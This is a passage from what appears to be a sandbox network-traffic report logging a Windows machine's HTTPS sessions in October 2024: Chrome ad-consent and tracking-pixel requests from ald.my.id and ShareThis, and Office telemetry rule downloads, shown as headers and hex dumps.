                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ages.google.com\/f\/AGSKWxUU4zxH41M_q8Dwr-I2eS6K4gHV_NcTsY9iECwX8Af_Wy5Mck_BWdvsvx7an2dqdzMPBxIxdxhiWuOgtk465S3UFEoPsqrDTrHOTPoHIToK1fEZnAJq27vrYaclK4V9ESCm9PFROg\\\\u003d\\\\u003d\\\x22\x5d,\x5bnull,\x5b7,6\x5d,null,null,null,null,null,null,null,null,nul
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          128192.168.2.749901142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC829OUTPOST /el/AGSKWxVAzDHl_-4j7DcCm6sYAbWFlq_mBsm_FyV6OOGNZcwDj1f1wVJJMJDPrG-A9X0dMOs9_cpdPTFlXO6fLqszIBQTCWLwCy0Y8TKsIXcvGA8rLOoYiWyUoC1SpBcoK0frF33KE48rcg== HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 155
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC155OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 32 38 38 39 37 31 36 30 34 37 35 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 32 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [null,null,null,null,null,null,null,null,1728897160475,null,null,[[2,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC1869INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce--V5b2S5cb6GlkX7_ttka4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzj0tDikmII1JBicEqfwRoCxO5aF1n9gfjrnkusf4F478dLrEeBWIiHo-vg5h1sAivWdMxkVHJJyi-MT87PK0nNK9FNTCnWBbGLMpNKS_KLUNipZSAVOfnp6Zl56fFGBkYmhgaGBnoGZvEFBgC6TS7w"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          129192.168.2.74990713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 401112aa-201e-005d-70d7-1aafb3000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091242Z-17db6f7c8cfnqpbkckdefmqa44000000065000000000730u
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          130192.168.2.74990613.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 6dd9b2f2-501e-0035-4e87-1bc923000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091242Z-17db6f7c8cfwtn5x6ye8p8q9m000000004qg000000008159
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          131192.168.2.74990913.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: a2dd0523-901e-0064-1fe2-1ae8a6000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091242Z-17db6f7c8cf6qp7g7r97wxgbqc00000005d000000000ark6
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          132192.168.2.74990813.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 150221b2-d01e-007a-13e9-1af38c000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091242Z-17db6f7c8cfspvtq2pgqb2w5k0000000063g000000003cg1
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          133192.168.2.74990513.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: bf053e75-701e-000d-6f20-1b6de3000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091242Z-17db6f7c8cfspvtq2pgqb2w5k00000000600000000008u8h
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          134192.168.2.74990018.195.70.1004432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC694OUTGET /ttd?uid=7d931d72-b6cd-40d8-9aaa-91033ac03d95&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: sync.sharethis.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Stid: ZHoAA2cM4IQAAAAICdw7Aw==
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains;
                                                                                                                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Connection: Close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          135192.168.2.7499103.120.214.2184432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC690OUTGET /pixel/bounce/?pid=1mpb5m0&t=gif&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ps.eyeota.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
